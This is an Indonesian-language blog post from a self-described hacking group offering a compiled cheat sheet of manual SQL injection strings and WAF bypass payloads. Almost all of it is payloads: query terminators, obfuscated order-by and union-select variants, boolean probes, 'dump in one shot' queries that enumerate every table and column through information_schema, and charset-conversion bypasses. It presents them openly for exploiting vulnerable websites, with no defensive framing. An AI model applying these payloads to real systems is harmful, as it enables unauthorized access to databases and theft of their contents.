Hallo sobat Garuda Tersakti 72, Assalamualaikum warah matullahi wabarakatuh, jumpa lagi sama gue, LoveTeeN72 Hehehee :D
Kali ini gue mau share macam-macam String Sekaligus beberapa Bypass Waff dengan methode SQL-Injection manual, bukan yang menggunakan tools hackbar/sqlmap atau sejenisnya yaa :D
Yuu, cek kebawaaah :D
Semua String Bypass dibawah ini, Saya ambil dari berbagai sumber dan dirangkum menjadi satu (Youtube, Group SQL-I, Forum, DLL)
[+] THIS IS STRING FOR EXECUTION WEBSITE VULN SQL-INJECTION [+]
'--+
'+--+
')--
')--+
')+--+
'))--+
[+] SEARCHING IN INJECT POINT [+]
order+by
group+by
order/**/by
order/**_**/by
/*!42247order*//**//*!42247by*/
%0aorder%0aby%0a
[+] UNION SELECT FOR NUMBER AT DATABASE [+]
union+select
union/**/select
union/**_**/select
.
id=1.unioN/**/distinct%20%73eleCt""a
id=1%.0unioN/**/distinct%20%73eleCt+-!~
id=1%""unioN/**/distinct%20%73eleCt@$%
id=1%''unioN/**/distinct%20%73eleCt@%C0%
cth :
id=1.unioN/**/distinct %73eleCt""a1,2,3``from.%20users``limit 0,1-- -
id=1%.0unioN/**/distinct %73eleCt+-!~a1,2,3|''from%20.users-- -
id=1%""unioN/**/distinct %73eleCt@$%a1,2,3|""from users-- -
id=1%''unioN/**/distinct %73eleCt@%C0%a1,2,3^""from users-- -
[+] AND FALSE OR AND TRUE [+]
and+0
div+0
and+false
having+0
having+1=0
and+1=0
limit 0
" and '1'='1
" and (1)=(1
where 1 /*!=*/ 2
/*!or*/1='1
[+] DUMB WITH DIOS [+]
concat_ws(0x3c62723e,0x415a5a41545353494e53,schema(),version(),user(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
concat_ws/**/(0x3c62723e,0x415a5a41545353494e53,database/**/(),version/**/(),user/**/(),(select%20concat/**/(@AZZATSSINS:=0x00,if((select%20count(*)%20/*!42247from*/%20/*!42247information_schema*/.columns%20/*!42247where*/%20/*!42247table_schema*/%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@AZZATSSINS:=concat/**/(@AZZATSSINS,0x3c62723e,/*!42247table_name*/,0x3a,/*!42247column_name*/)),0x00,0x00),@AZZATSSINS)))
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
[+] BYPASS WITH CONVERT [+]
*convert(concat(schema()+using+ascii)
ujis
ucs2
tis620
swe7
sjis
Hahaha, dikit ya? Engga ko sebenernya banyak Paman :)
Mau? Klik Dibawah yaa :D
Thanks For Injector~
Special Thanks To AZZATSSINS~
Dan cek juga Artikel kami tentang Bypass Waff :D
Dan Jangan Lupa Support Kami dengan Like,Subscribe, And Share Agar Kami terus Semangat Post Artikel selanjutnyaa , hehehee .
0 Response to "KUMPULAN STRING SQL-INJECTION TERBARU"
Post a Comment